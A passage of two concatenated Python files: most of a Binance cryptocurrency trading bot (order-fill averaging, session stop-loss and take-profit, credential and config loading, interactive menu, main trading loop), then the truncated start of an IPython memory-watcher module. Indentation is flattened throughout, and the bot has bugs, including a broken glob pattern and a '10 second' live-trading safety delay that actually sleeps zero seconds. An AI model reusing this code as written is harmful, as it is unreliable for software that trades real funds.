# adding order fill extractions here
#
# just to explain what I am doing here:
# Market orders are not always filled at one price, we need to find the averages of all 'parts' (fills) of this order.
#
# reset other variables to 0 before use
FILLS_TOTAL = 0
FILLS_QTY = 0
FILLS_FEE = 0
BNB_WARNING = 0
# loop through each 'fill':
for fills in order_details['fills']:
FILL_PRICE = float(fills['price'])
FILL_QTY = float(fills['qty'])
FILLS_FEE += float(fills['commission'])
# check if the fee was in BNB. If not, log a nice warning:
if (fills['commissionAsset'] != 'BNB') and (TRADING_FEE == 0.075) and (BNB_WARNING == 0):
if not SCREEN_MODE == 2: print(f"WARNING: BNB not used for trading fee, please ")
BNB_WARNING += 1
# quantity of fills * price
FILLS_TOTAL += (FILL_PRICE * FILL_QTY)
# add to running total of fills quantity
FILLS_QTY += FILL_QTY
# increase fills array index by 1
# calculate average fill price:
FILL_AVG = (FILLS_TOTAL / FILLS_QTY)
#tradeFeeApprox = (float(FILLS_QTY) * float(FILL_AVG)) * (TRADING_FEE/100)
# Olorin Sledge: I only want fee at the unit level, not the total level
tradeFeeApprox = float(FILL_AVG) * (TRADING_FEE/100)
# the volume size is sometimes outside of precision, correct it
try:
info = client.get_symbol_info(order_details['symbol'])
step_size = info['filters'][2]['stepSize']
lot_size = step_size.index('1') - 1
if lot_size <= 0:
FILLS_QTY = int(FILLS_QTY)
else:
FILLS_QTY = truncate(FILLS_QTY, lot_size)
except Exception as e:
if not SCREEN_MODE == 2: print(f"extract_order_data(): Exception getting coin {order_details['symbol']} step size! Exception: {e}")
# create object with received data from Binance
transactionInfo = {
'symbol': order_details['symbol'],
'orderId': order_details['orderId'],
'timestamp': order_details['transactTime'],
'avgPrice': float(FILL_AVG),
'volume': float(FILLS_QTY),
'tradeFeeBNB': float(FILLS_FEE),
'tradeFeeUnit': tradeFeeApprox,
}
return transactionInfo
def check_total_session_profit(coins_bought, last_price):
global is_bot_running, session_tpsl_override_msg
unrealised_session_profit_incfees_total = 0
BUDGET = TRADE_SLOTS * TRADE_TOTAL
for coin in list(coins_bought):
LastPrice = float(last_price[coin]['price'])
sellFee = (LastPrice * (TRADING_FEE/100))
BuyPrice = float(coins_bought[coin]['bought_at'])
buyFee = (BuyPrice * (TRADING_FEE/100))
#PriceChangeIncFees_Total = float(((LastPrice+sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
PriceChangeIncFees_Total = float(((LastPrice-sellFee) - (BuyPrice+buyFee)) * coins_bought[coin]['volume'])
unrealised_session_profit_incfees_total = float(unrealised_session_profit_incfees_total + PriceChangeIncFees_Total)
allsession_profits_perc = session_profit_incfees_perc + ((unrealised_session_profit_incfees_total / BUDGET) * 100)
if DEBUG: print(f'Session Override SL Feature: ASPP={allsession_profits_perc} STP {SESSION_TAKE_PROFIT} SSL {SESSION_STOP_LOSS}')
if allsession_profits_perc >= float(SESSION_TAKE_PROFIT):
session_tpsl_override_msg = "Session TP Override target of " + str(SESSION_TAKE_PROFIT) + "% met. Sell all coins now!"
is_bot_running = False
if allsession_profits_perc <= float(SESSION_STOP_LOSS):
session_tpsl_override_msg = "Session SL Override target of " + str(SESSION_STOP_LOSS) + "% met. Sell all coins now!"
is_bot_running = False
def update_portfolio(orders, last_price, volume):
'''add every coin bought to our portfolio for tracking/selling later'''
# print(orders)
for coin in orders:
try:
coin_step_size = float(next(
filter(lambda f: f['filterType'] == 'LOT_SIZE', client.get_symbol_info(orders[coin][0]['symbol'])['filters'])
)['stepSize'])
except Exception as ExStepSize:
coin_step_size = .1
if not TEST_MODE:
coins_bought[coin] = {
'symbol': orders[coin]['symbol'],
'orderid': orders[coin]['orderId'],
'timestamp': orders[coin]['timestamp'],
'bought_at': orders[coin]['avgPrice'],
'volume': orders[coin]['volume'],
'volume_debug': volume[coin],
'buyFeeBNB': orders[coin]['tradeFeeBNB'],
'buyFee': orders[coin]['tradeFeeUnit'] * orders[coin]['volume'],
'stop_loss': -STOP_LOSS,
'take_profit': TAKE_PROFIT,
'step_size': float(coin_step_size),
}
if not SCREEN_MODE == 2: print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Order for {orders[coin]["symbol"]} with ID {orders[coin]["orderId"]} placed and saved to file.')
else:
coins_bought[coin] = {
'symbol': orders[coin][0]['symbol'],
'orderid': orders[coin][0]['orderId'],
'timestamp': orders[coin][0]['time'],
'bought_at': last_price[coin]['price'],
'volume': volume[coin],
'stop_loss': -STOP_LOSS,
'take_profit': TAKE_PROFIT,
'step_size': float(coin_step_size),
}
if not SCREEN_MODE == 2: print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Order for {orders[coin][0]["symbol"]} with ID {orders[coin][0]["orderId"]} placed and saved to file.')
# save the coins in a json file in the same directory
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
def update_bot_stats():
global trade_wins, trade_losses, historic_profit_incfees_perc, historic_profit_incfees_total, session_USDT_EARNED, USED_BNB_IN_SESSION
bot_stats = {
'total_capital' : str(TRADE_SLOTS * TRADE_TOTAL),
'botstart_datetime' : str(bot_started_datetime),
'historicProfitIncFees_Percent': historic_profit_incfees_perc,
'historicProfitIncFees_Total': format(historic_profit_incfees_total, ".14f"),
'tradeWins': trade_wins,
'tradeLosses': trade_losses,
'session_'+ PAIR_WITH + '_EARNED': format(session_USDT_EARNED, ".14f"),
'used_bnb_in_session': USED_BNB_IN_SESSION,
}
#save session info for through session portability
with open(bot_stats_file_path, 'w') as file:
json.dump(bot_stats, file, indent=4)
def remove_from_portfolio(coins_sold):
'''Remove coins sold due to SL or TP from portfolio'''
for coin in coins_sold:
# code below created by getsec <3
coins_bought.pop(coin)
with open(coins_bought_file_path, 'w') as file:
json.dump(coins_bought, file, indent=4)
if os.path.exists('signalsell_tickers.txt'):
os.remove('signalsell_tickers.txt')
for coin in coins_bought:
write_signallsell(coin.removesuffix(PAIR_WITH))
def write_signallsell(symbol):
with open('signalsell_tickers.txt','a+') as f:
f.write(f'{symbol}\n')
def remove_external_signals(fileext):
signals = glob.glob('signals/*.{fileext}')
for filename in signals:
for line in open(filename):
try:
os.remove(filename)
except:
if DEBUG: write_log(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Could not remove external signalling file {filename}{txcolors.DEFAULT}')
def load_signal_threads():
# load signalling modules
global signalthreads
signalthreads = []
try:
if SIGNALLING_MODULES is not None:
if len(SIGNALLING_MODULES) > 0:
for module in SIGNALLING_MODULES:
print(f'Starting {module}')
mymodule[module] = importlib.import_module(module)
# t = threading.Thread(target=mymodule[module].do_work, args=())
t = multiprocessing.Process(target=mymodule[module].do_work, args=())
t.name = module
t.daemon = True
t.start()
# add process to a list. This is so the thread can be terminated at a later time
signalthreads.append(t)
time.sleep(2)
else:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}No modules to load {SIGNALLING_MODULES}')
except Exception as e:
write_log(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT} load_signal_threads: Loading external signals exception: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
def stop_signal_threads():
global signalthreads
try:
for signalthread in signalthreads:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Terminating thread {str(signalthread.name)}')
signalthread.terminate()
except Exception as e:
write_log(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}{"stop_signal_threads"}: Exception in function: {e}')
pass
except KeyboardInterrupt as ki:
pass
def truncate(number, decimals=0):
"""
Returns a value truncated to a specific number of decimal places.
Better than rounding
"""
if not isinstance(decimals, int):
raise TypeError("decimal places must be an integer.")
elif decimals < 0:
raise ValueError("decimal places has to be 0 or more.")
elif decimals == 0:
return math.trunc(number)
factor = 10.0 ** decimals
return math.trunc(number * factor) / factor
def load_settings():
# set to false at Start
global bot_paused, parsed_config, creds_file, access_key, secret_key, parsed_creds
bot_paused = False
DEFAULT_CONFIG_FILE = 'config.yml'
DEFAULT_CREDS_FILE = 'creds.yml'
config_file = args.config if args.config else DEFAULT_CONFIG_FILE
creds_file = args.creds if args.creds else DEFAULT_CREDS_FILE
parsed_config = load_config(config_file)
parsed_creds = load_config(creds_file)
# Default no debugging
global DEBUG, TEST_MODE, LOG_TRADES, TRADES_LOG_FILE, DEBUG_SETTING, AMERICAN_USER, PAIR_WITH, QUANTITY, MAX_COINS, FIATS, TIME_DIFFERENCE, RECHECK_INTERVAL, CHANGE_IN_PRICE, STOP_LOSS, TAKE_PROFIT, CUSTOM_LIST, TICKERS_LIST, USE_TRAILING_STOP_LOSS, TRAILING_STOP_LOSS, TRAILING_TAKE_PROFIT, TRADING_FEE, SIGNALLING_MODULES, SCREEN_MODE, MSG_DISCORD, HISTORY_LOG_FILE, TRADE_SLOTS, TRADE_TOTAL, SESSION_TPSL_OVERRIDE, SELL_ON_SIGNAL_ONLY, TRADING_FEE, SIGNALLING_MODULES, SHOW_INITIAL_CONFIG, USE_MOST_VOLUME_COINS, COINS_MAX_VOLUME, COINS_MIN_VOLUME, DISABLE_TIMESTAMPS, STATIC_MAIN_INFO, COINS_BOUGHT, BOT_STATS, MAIN_FILES_PATH, PRINT_TO_FILE, ENABLE_PRINT_TO_FILE, EX_PAIRS, RESTART_MODULES, SHOW_TABLE_COINS_BOUGHT, ALWAYS_OVERWRITE, SORT_TABLE_BY, REVERSE_SORT, MAX_HOLDING_TIME, IGNORE_FEE, EXTERNAL_COINS, PROXY_HTTP, PROXY_HTTPS, SIGNALLING_MODULES, REINVEST_MODE, LOG_FILE
# Default no debugging
DEBUG = False
# Load system vars
TEST_MODE = parsed_config['script_options']['TEST_MODE']
#REINVEST_MODE = parsed_config['script_options']['REINVEST_MODE']
# LOG_TRADES = parsed_config['script_options'].get('LOG_TRADES')
MAIN_FILES_PATH = parsed_config['script_options'].get('MAIN_FILES_PATH')
TRADES_LOG_FILE = parsed_config['script_options'].get('TRADES_LOG_FILE')
HISTORY_LOG_FILE = parsed_config['script_options'].get('HISTORY_LOG_FILE')
LOG_FILE = parsed_config['script_options'].get('LOG_FILE')
#HISTORY_LOG_FILE = "history.html"
COINS_BOUGHT = parsed_config['script_options'].get('COINS_BOUGHT')
BOT_STATS = parsed_config['script_options'].get('BOT_STATS')
DEBUG_SETTING = parsed_config['script_options'].get('DEBUG')
AMERICAN_USER = parsed_config['script_options'].get('AMERICAN_USER')
EXTERNAL_COINS = parsed_config['script_options']['EXTERNAL_COINS']
# Load trading vars
PAIR_WITH = parsed_config['trading_options']['PAIR_WITH']
TRADE_TOTAL = parsed_config['trading_options']['TRADE_TOTAL']
TRADE_SLOTS = parsed_config['trading_options']['TRADE_SLOTS']
#FIATS = parsed_config['trading_options']['FIATS']
EX_PAIRS = parsed_config['trading_options']['EX_PAIRS']
TIME_DIFFERENCE = parsed_config['trading_options']['TIME_DIFFERENCE']
RECHECK_INTERVAL = parsed_config['trading_options']['RECHECK_INTERVAL']
CHANGE_IN_PRICE = parsed_config['trading_options']['CHANGE_IN_PRICE']
STOP_LOSS = parsed_config['trading_options']['STOP_LOSS']
TAKE_PROFIT = parsed_config['trading_options']['TAKE_PROFIT']
#COOLOFF_PERIOD = parsed_config['trading_options']['COOLOFF_PERIOD']
CUSTOM_LIST = parsed_config['trading_options']['CUSTOM_LIST']
TICKERS_LIST = parsed_config['trading_options']['TICKERS_LIST']
USE_TRAILING_STOP_LOSS = parsed_config['trading_options']['USE_TRAILING_STOP_LOSS']
TRAILING_STOP_LOSS = parsed_config['trading_options']['TRAILING_STOP_LOSS']
TRAILING_TAKE_PROFIT = parsed_config['trading_options']['TRAILING_TAKE_PROFIT']
# Code modified from DJCommie fork
# Load Session OVERRIDE values - used to STOP the bot when current session meets a certain STP or SSL value
SESSION_TPSL_OVERRIDE = parsed_config['trading_options']['SESSION_TPSL_OVERRIDE']
SESSION_TAKE_PROFIT = parsed_config['trading_options']['SESSION_TAKE_PROFIT']
SESSION_STOP_LOSS = parsed_config['trading_options']['SESSION_STOP_LOSS']
# Borrowed from DJCommie fork
# If TRUE, coin will only sell based on an external SELL signal
SELL_ON_SIGNAL_ONLY = parsed_config['trading_options']['SELL_ON_SIGNAL_ONLY']
# Discord integration
# Used to push alerts, messages etc to a discord channel
MSG_DISCORD = parsed_config['trading_options']['MSG_DISCORD']
sell_all_coins = False
sell_specific_coin = False
# Functionality to "reset / restart" external signal modules(code os OlorinSledge)
RESTART_MODULES = parsed_config['trading_options']['RESTART_MODULES']
#minimal mode
SCREEN_MODE = parsed_config['trading_options']['SCREEN_MODE']
STATIC_MAIN_INFO = parsed_config['trading_options']['STATIC_MAIN_INFO']
DISABLE_TIMESTAMPS = parsed_config['trading_options']['DISABLE_TIMESTAMPS']
#PRINT_TO_FILE = parsed_config['trading_options']['PRINT_TO_FILE']
#ENABLE_PRINT_TO_FILE = parsed_config['trading_options']['ENABLE_PRINT_TO_FILE']
TRADING_FEE = parsed_config['trading_options']['TRADING_FEE']
SIGNALLING_MODULES = parsed_config['trading_options']['SIGNALLING_MODULES']
SHOW_INITIAL_CONFIG = parsed_config['trading_options']['SHOW_INITIAL_CONFIG']
SHOW_TABLE_COINS_BOUGHT = parsed_config['trading_options']['SHOW_TABLE_COINS_BOUGHT']
USE_MOST_VOLUME_COINS = parsed_config['trading_options']['USE_MOST_VOLUME_COINS']
COINS_MAX_VOLUME = parsed_config['trading_options']['COINS_MAX_VOLUME']
COINS_MIN_VOLUME = parsed_config['trading_options']['COINS_MIN_VOLUME']
ALWAYS_OVERWRITE = parsed_config['trading_options']['ALWAYS_OVERWRITE']
SORT_TABLE_BY = parsed_config['trading_options']['SORT_TABLE_BY']
REVERSE_SORT = parsed_config['trading_options']['REVERSE_SORT']
MAX_HOLDING_TIME = parsed_config['trading_options']['MAX_HOLDING_TIME']
IGNORE_FEE = parsed_config['trading_options']['IGNORE_FEE']
PROXY_HTTP = parsed_config['script_options']['PROXY_HTTP']
PROXY_HTTPS = parsed_config['script_options']['PROXY_HTTPS']
#BNB_FEE = parsed_config['trading_options']['BNB_FEE']
#TRADING_OTHER_FEE = parsed_config['trading_options']['TRADING_OTHER_FEE']
if DEBUG_SETTING or args.debug:
DEBUG = True
access_key, secret_key = load_correct_creds(parsed_creds)
def renew_list():
global tickers, VOLATILE_VOLUME_LIST, FLAG_PAUSE, COINS_MAX_VOLUME, COINS_MIN_VOLUME
try:
if USE_MOST_VOLUME_COINS == True:
if VOLATILE_VOLUME_LIST == "volatile_volume_" + str(date.today()) + ".txt" and os.path.exists(VOLATILE_VOLUME_LIST) == True:
tickers=[line.strip() for line in open(VOLATILE_VOLUME_LIST)]
else:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}A new Volatily Volume list will be created...')
stop_signal_threads()
FLAG_PAUSE = True
if TEST_MODE == True:
jsonfile = "test_" + COINS_BOUGHT
else:
jsonfile = "live_" + COINS_BOUGHT
with open(jsonfile,'r') as f:
coins_bought_list = json.load(f)
coinstosave = []
for coin in coins_bought_list:
coinstosave.append(coin.replace(PAIR_WITH,"") + "\n")
VOLATILE_VOLUME_LIST = get_volume_list()
with open(VOLATILE_VOLUME_LIST,'r') as f:
lines = f.readlines()
for c in coinstosave:
for l in lines:
if c == l:
break
else:
lines.append(c)
break
with open(VOLATILE_VOLUME_LIST,'w') as f:
f.writelines(lines)
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}A new Volatily Volume list has been created...')
FLAG_PAUSE = False
#renew_list()
load_signal_threads()
else:
tickers=[line.strip() for line in open(TICKERS_LIST)]
except Exception as e:
write_log(f'{"renew_list"}: Exception in function: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
def new_or_continue():
if TEST_MODE:
file_prefix = 'test_'
else:
file_prefix = 'live_'
if os.path.exists(file_prefix + str(COINS_BOUGHT)) or os.path.exists(file_prefix + str(BOT_STATS)):
LOOP = True
END = False
while LOOP:
if ALWAYS_OVERWRITE == False:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Do you want to continue previous session?[y/n]{txcolors.DEFAULT}')
x = input("#: ")
else:
x = "n"
if x == "y" or x == "n":
if x == "y":
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Continuing with the session started ...{txcolors.DEFAULT}')
LOOP = False
END = True
else:
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Deleting previous sessions ...')
if os.path.exists(file_prefix + COINS_BOUGHT): os.remove(file_prefix + COINS_BOUGHT)
if os.path.exists(file_prefix + BOT_STATS): os.remove(file_prefix + BOT_STATS)
if os.path.exists(EXTERNAL_COINS): os.remove(EXTERNAL_COINS)
if os.path.exists(file_prefix + TRADES_LOG_FILE): os.remove(file_prefix + TRADES_LOG_FILE)
if os.path.exists(file_prefix + HISTORY_LOG_FILE): os.remove(file_prefix + HISTORY_LOG_FILE)
if os.path.exists(EXTERNAL_COINS): os.remove(EXTERNAL_COINS)
if os.path.exists(file_prefix + LOG_FILE): os.remove(file_prefix + LOG_FILE)
files = []
folder = "signals"
files = [item for sublist in [glob.glob(folder + ext) for ext in ["/*.pause", "/*.buy","/*.sell"]] for item in sublist]
for filename in files:
if os.path.exists(filename): os.remove(filename)
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Session deleted, continuing ...')
LOOP = False
END = True
else:
print(f'Press the y key or the or key ...')
LOOP = True
return END
def menu():
try:
global COINS_MAX_VOLUME, COINS_MIN_VOLUME
global SCREEN_MODE, PAUSEBOT_MANUAL
END = False
LOOP = True
stop_signal_threads()
while LOOP:
time.sleep(5)
print(f'')
print(f'')
print(f'{txcolors.MENUOPTION}[1]{txcolors.WARNING}Reload Configuration{txcolors.DEFAULT}')
print(f'{txcolors.MENUOPTION}[2]{txcolors.WARNING}Reload modules{txcolors.DEFAULT}')
print(f'{txcolors.MENUOPTION}[3]{txcolors.WARNING}Reload Volatily Volume List{txcolors.DEFAULT}')
if PAUSEBOT_MANUAL == False:
print(f'{txcolors.MENUOPTION}[4]{txcolors.WARNING}Stop Purchases{txcolors.DEFAULT}')
else:
print(f'{txcolors.MENUOPTION}[4]{txcolors.WARNING}Start Purchases{txcolors.DEFAULT}')
print(f'{txcolors.MENUOPTION}[5]{txcolors.WARNING}Sell Specific Coin{txcolors.DEFAULT}')
print(f'{txcolors.MENUOPTION}[6]{txcolors.WARNING}Sell All Coins{txcolors.DEFAULT}')
print(f'{txcolors.MENUOPTION}[7]{txcolors.WARNING}Exit BOT{txcolors.DEFAULT}')
x = input('Please enter your choice: ')
x = int(x)
print(f'')
print(f'')
if x == 1:
load_settings()
#print(f'TICKERS_LIST(menu): ' + TICKERS_LIST)
renew_list()
LOOP = False
load_signal_threads()
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Reaload Completed{txcolors.DEFAULT}')
elif x == 2:
stop_signal_threads()
load_signal_threads()
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Modules Realoaded Completed{txcolors.DEFAULT}')
LOOP = False
elif x == 3:
stop_signal_threads()
#load_signal_threads()
global VOLATILE_VOLUME_LIST
if USE_MOST_VOLUME_COINS == True:
os.remove(VOLATILE_VOLUME_LIST)
VOLATILE_VOLUME_LIST = get_volume_list()
renew_list()
else:
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}USE_MOST_VOLUME_COINS must be true in config.yml{txcolors.DEFAULT}')
LOOP = False
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}VOLATILE_VOLUME_LIST Realoaded Completed{txcolors.DEFAULT}')
load_signal_threads()
LOOP = False
elif x == 4:
if PAUSEBOT_MANUAL == False:
PAUSEBOT_MANUAL = True
LOOP = False
else:
PAUSEBOT_MANUAL = False
LOOP = False
elif x == 5:
#part of extracted from the code of OlorinSledge
stop_signal_threads()
while not x == "n":
last_price = get_price()
print_table_coins_bought()
print(f'{txcolors.WARNING}\nType in the Symbol you wish to sell. [n] to continue BOT.{txcolors.DEFAULT}')
x = input("#: ")
if x == "":
break
sell_coin(x.upper() + PAIR_WITH)
load_signal_threads()
LOOP = False
elif x == 6:
stop_signal_threads()
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Do you want to sell all coins?[y/n]{txcolors.DEFAULT}')
sellall = input("#: ")
if sellall.upper() == "Y":
sell_all('Sell all, manual choice!')
load_signal_threads()
LOOP = False
elif x == 7:
# stop external signal threads
stop_signal_threads()
# ask user if they want to sell all coins
#print(f'\n\n\n')
#print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Program execution ended by user!\n\nDo you want to sell all coins?[y/n]{txcolors.DEFAULT}')
#sellall = input("#: ")
#if sellall.upper() == "Y":
# sell all coins
#sell_all('Program execution ended by user!')
#END = True
#LOOP = False
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Program execution ended by user!')
sys.exit(0)
#else:
#END = True
#LOOP = False
else:
print(f'wrong choice')
LOOP = True
except Exception as e:
write_log(f'Exception in menu() 1: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
except KeyboardInterrupt as ki:
menu()
return END
if __name__ == '__main__':
req_version = (3,9)
if sys.version_info[:2] < req_version:
print(f'This bot requires Python version 3.9 or higher/newer. You are running version {sys.version_info[:2]} - please upgrade your Python version!!')
sys.exit()
# Load arguments then parse settings
args = parse_args()
mymodule = {}
print(f'')
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Initializing, wait a moment...')
discord_msg_balance_data = ""
last_msg_discord_balance_date = datetime.now()
last_history_log_date = datetime.now()
load_settings()
if DISABLE_TIMESTAMPS == False:
# print with timestamps
old_out = sys.stdout
class St_ampe_dOut:
"""Stamped stdout."""
nl = True
def write(self, x):
"""Write function overloaded."""
if x == '\n':
old_out.write(x)
self.nl = True
elif self.nl:
old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}')
self.nl = False
else:
old_out.write(x)
def flush(self):
pass
sys.stdout = St_ampe_dOut()
# Load creds for correct environment
if DEBUG:
if SHOW_INITIAL_CONFIG == True: print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Loaded config below\n{json.dumps(parsed_config, indent=4)}')
if SHOW_INITIAL_CONFIG == True: print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Your credentials have been loaded from {creds_file}')
if MSG_DISCORD:
DISCORD_WEBHOOK = load_discord_creds(parsed_creds)
if MSG_DISCORD:
MSG_DISCORD = True
sell_all_coins = False
sell_specific_coin = False
# Authenticate with the client, Ensure API key is good before continuing
if AMERICAN_USER:
if PROXY_HTTP != '' or PROXY_HTTPS != '':
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT} Using proxy ...')
proxies = {
'http': PROXY_HTTP,
'https': PROXY_HTTPS
}
client = Client(access_key, secret_key, {'proxies': proxies}, tld='us')
else:
client = Client(access_key, secret_key, tld='us')
else:
if PROXY_HTTP != '' or PROXY_HTTPS != '':
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT} Using proxy ...')
proxies = {
'http': PROXY_HTTP,
'https': PROXY_HTTPS
}
client = Client(access_key, secret_key, {'proxies': proxies})
else:
client = Client(access_key, secret_key)
# If the users has a bad / incorrect API key.
# this will stop the script from starting, and display a helpful error.
api_ready, msg = test_api_key(client, BinanceAPIException)
if api_ready is not True:
exit(f'{txcolors.SELL_LOSS}{msg}{txcolors.DEFAULT}')
global VOLATILE_VOLUME_LIST
if USE_MOST_VOLUME_COINS == True: VOLATILE_VOLUME_LIST = get_volume_list()
renew_list()
new_or_continue()
# try to load all the coins bought by the bot if the file exists and is not empty
coins_bought = {}
if TEST_MODE:
file_prefix = 'test_'
else:
file_prefix = 'live_'
# path to the saved coins_bought file
coins_bought_file_path = file_prefix + COINS_BOUGHT
# The below mod was stolen and altered from GoGo's fork, a nice addition for keeping a historical history of profit across multiple bot sessions.
# path to the saved bot_stats file
bot_stats_file_path = file_prefix + BOT_STATS
# use separate files for testing and live trading
#TRADES_LOG_FILE = file_prefix + TRADES_LOG_FILE
#HISTORY_LOG_FILE = file_prefix + HISTORY_LOG_FILE
bot_started_datetime = datetime.now()
total_capital_config = TRADE_SLOTS * TRADE_TOTAL
if os.path.isfile(bot_stats_file_path) and os.stat(bot_stats_file_path).st_size!= 0:
with open(bot_stats_file_path) as file:
bot_stats = json.load(file)
# load bot stats:
try:
bot_started_datetime = datetime.strptime(bot_stats['botstart_datetime'], '%Y-%m-%d %H:%M:%S.%f')
except Exception as e:
print (f'Exception on reading botstart_datetime from {bot_stats_file_path}. Exception: {e}')
bot_started_datetime = datetime.now()
try:
total_capital = bot_stats['total_capital']
except Exception as e:
print (f'Exception on reading total_capital from {bot_stats_file_path}. Exception: {e}')
total_capital = TRADE_SLOTS * TRADE_TOTAL
historic_profit_incfees_perc = float(bot_stats['historicProfitIncFees_Percent'])
historic_profit_incfees_total = float(bot_stats['historicProfitIncFees_Total'])
trade_wins = bot_stats['tradeWins']
trade_losses = bot_stats['tradeLosses']
session_USDT_EARNED = float(bot_stats['session_' + PAIR_WITH + '_EARNED'])
if total_capital != total_capital_config:
historic_profit_incfees_perc = (historic_profit_incfees_total / total_capital_config) * 100
# rolling window of prices; cyclical queue
historical_prices = [None] * (TIME_DIFFERENCE * RECHECK_INTERVAL)
hsp_head = -1
# prevent including a coin in volatile_coins if it has already appeared there less than TIME_DIFFERENCE minutes ago
volatility_cooloff = {}
# if saved coins_bought json file exists and it's not empty then load it
if os.path.isfile(coins_bought_file_path) and os.stat(coins_bought_file_path).st_size!= 0:
with open(coins_bought_file_path) as file:
coins_bought = json.load(file)
print('Press Ctrl-C to stop the script')
if not TEST_MODE:
if not args.notimeout: # if notimeout skip this (fast for dev tests)
write_log(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}WARNING: Test mode is disabled in the configuration, you are using _LIVE_ funds.')
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}WARNING: Waiting 10 seconds before live trading as a security measure!')
time.sleep(0)
remove_external_signals('buy')
remove_external_signals('sell')
remove_external_signals('pause')
#load_signal_threads()
load_signal_threads()
# seed initial prices
get_price()
TIMEOUT_COUNT=0
READ_CONNECTERR_COUNT=0
BINANCE_API_EXCEPTION=0
#extract of code of OlorinSledge, Thanks
thehour = datetime.now().hour
coins_sold = {}
while is_bot_running:
try:
orders, last_price, volume = buy()
update_portfolio(orders, last_price, volume)
if SESSION_TPSL_OVERRIDE:
check_total_session_profit(coins_bought, last_price)
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
update_bot_stats()
#coins_sold = sell_coins()
#remove_from_portfolio(coins_sold)
#update_bot_stats()
if FLAG_PAUSE == False:
#extract of code of OlorinSledge, Thanks
if RESTART_MODULES and thehour != datetime.now().hour :
stop_signal_threads()
load_signal_threads()
thehour = datetime.now().hour
print(f'{txcolors.WARNING}BOT: {txcolors.WARNING}Modules Realoaded Completed{txcolors.DEFAULT}')
except ReadTimeout as rt:
TIMEOUT_COUNT += 1
write_log(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}We got a timeout error from Binance. Re-loop. Connection Timeouts so far: {TIMEOUT_COUNT}')
except ConnectionError as ce:
READ_CONNECTERR_COUNT += 1
write_log(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}We got a connection error from Binance. Re-loop. Connection Errors so far: {READ_CONNECTERR_COUNT}')
except BinanceAPIException as bapie:
BINANCE_API_EXCEPTION += 1
write_log(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}We got an API error from Binance. Re-loop. API Errors so far: {BINANCE_API_EXCEPTION}.\nException:\n{bapie}')
except KeyboardInterrupt as ki:
if menu() == True: sys.exit(0)
try:
if not is_bot_running:
if SESSION_TPSL_OVERRIDE:
print(f'')
print(f'')
print(f'{txcolors.WARNING}{session_tpsl_override_msg}{txcolors.DEFAULT}')
sell_all(session_tpsl_override_msg, True)
sys.exit(0)
else:
print(f'')
print(f'')
print(f'{txcolors.WARNING}BOT: {txcolors.DEFAULT}Bot terminated for some reason.')
except Exception as e:
write_log(f'Exception in main() 1: {e}')
write_log("Error on line {}".format(sys.exc_info()[-1].tb_lineno))
pass
except KeyboardInterrupt as ki:
pass
|
memwatcher.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Profile mem usage envelope of IPython commands and report interactively"""
from __future__ import division # 1/2 == 0.5, as in Py3
from __future__ import absolute_import # avoid hiding global modules with locals
from __future__ import print_function # force use of print("hello")
from __future__ import unicode_literals # force unadorned strings "" to be unicode without prepending u""
import time
import memory_profiler
from collections import namedtuple
import threading
from IPython import get_ipython
__version__ = "0.2.5"
class MemWatcher(object):
def __init__(self):
# keep a global accounting for the last known memory usage
# which is the reference point for the memory delta calculation
self.previous_call_memory_usage = memory_profiler.memory_usage()[0]
self.t1 = time.time() # will be set to current time later
self.keep_watching = True
self.peak_memory_usage = -1
self.peaked_memory_usage = -1
self.memory_delta = 0
self.time_delta = 0
self.watching_memory = True
self.ip = get_ipython()
self.input_cells = self.ip.user_ns['In']
self._measurements = namedtuple(
'Measurements',
['memory_delta', 'time_delta', 'memory_peak', 'memory_usage'],
)
@property
def measurements(self):
return self._measurements(
self.memory_delta, self.time_delta,
self.peaked_memory_usage, self.previous_call_memory_usage)
def start_watching_memory(self):
"""Register memory profiling tools to IPython instance."""
# Just in case start is called more than once, stop watching. Hence unregister events.
self.stop_watching_memory()
self.watching_memory = True
self.ip.events.register("post_run_cell", self.watch_memory)
self.ip.events.register("pre_run_cell", self.pre_run_cell)
def stop_watching_memory(self):
"""Unregister memory profiling tools from IPython instance."""
self.watching_memory = False
try:
self.ip.events.unregister("post_run_cell", self.watch_memory)
except ValueError:
pass
try:
self.ip.events.unregister("pre_run_cell", self.pre_run_cell)
except ValueError:
pass
def watch_memory(self):
if not self.watching_memory:
return
# calculate time delta using global t1 (from the pre-run
# event) and current time
